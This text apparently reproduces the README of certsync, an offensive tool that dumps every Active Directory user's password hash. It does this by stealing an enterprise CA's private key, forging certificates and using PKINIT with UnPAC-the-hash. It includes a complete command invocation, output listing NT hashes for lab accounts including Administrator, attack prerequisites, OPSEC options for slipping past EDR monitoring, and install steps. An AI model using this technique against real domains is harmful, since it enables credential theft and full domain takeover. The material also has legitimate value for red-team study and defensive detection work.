certsync: Dump NTDS with golden certificates and UnPAC the hash

certsync

certsync is a new technique in order to dump NTDS remotely, but this time without DRSUAPI: it uses a golden certificate and UnPAC the hash. It works in several steps:

1. Dump user list, CA information, and CRL from LDAP
2. Dump CA certificate and private key
3. Forge offline a certificate for every user
4. UnPAC the hash for every user in order to get nt and lm hashes

   $ certsync -u khal.drogo -p 'horse' -d essos.local -dc-ip 192.168.56.12 -ns 192.168.56.12
   
   [*] Collecting userlist, CA info and CRL on LDAP
   
   [*] Found 13 users in LDAP
   
   [*] Found CA ESSOS-CA on braavos.essos.local(192.168.56.23)
   
   [*] Dumping CA certificate and private key
   
   [*] Forging certificates for every users. This can take some time...
   
   [*] PKINIT + UnPAC the hashes
   
   ESSOS.LOCAL/BRAAVOS$:1104:aad3b435b51404eeaad3b435b51404ee:08083254c2fd4079e273c6c783abfbb7:::
   
   ESSOS.LOCAL/MEEREEN$:1001:aad3b435b51404eeaad3b435b51404ee:b79758e15b7870d28ad0769dfc784ca4:::
   
   ESSOS.LOCAL/sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
   
   ESSOS.LOCAL/jorah.mormont:1113:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
   
   ESSOS.LOCAL/khal.drogo:1112:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
   
   ESSOS.LOCAL/viserys.targaryen:1111:aad3b435b51404eeaad3b435b51404ee:d96a55df6bef5e0b4d6d956088036097:::
   
   ESSOS.LOCAL/daenerys.targaryen:1110:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::
   
   ESSOS.LOCAL/SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:b63b6ef2caab52ffcb26b3870dc0c4db:::
   
   ESSOS.LOCAL/vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
   
   ESSOS.LOCAL/Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::

    

    

Why

DSRUAPI is more and more monitored and sometimes restricted by EDR solutions. Moreover, certsync does not require to use of a Domain Administrator, it only requires a CA Administrator.

Requirements

This attack needs:

• A configured Enterprise CA on an ADCS server in the domain,
• PKINIT working,
• A domain account which is a local administrator on the ADCS server, or export of the CA certificate and private key.

Limitations

Since we cannot PKINIT for users that are revoked, we cannot dump their hashes.

OPSEC

Some options were added to customize the behaviour of the tool:

• -ldap-filter: change the LDAP filter used to select usernames to certsync.
• -template: use an already delivered certificate to mimic it when forging users’ certificates.
• -timeout and -jitter: change timeout between PKINIT authentication requests.
• -randomize: By default, every forged user certificate will have the same private key, serial number, and validity dates. This parameter will randomize them, but the forging will take longer.

Install

git clone https://github.com/zblurx/certsync
cd certsync
pip install .

or

pip install certsync

Use

Copyright (c) 2018 Tamas Jos

Source: https://github.com/zblurx/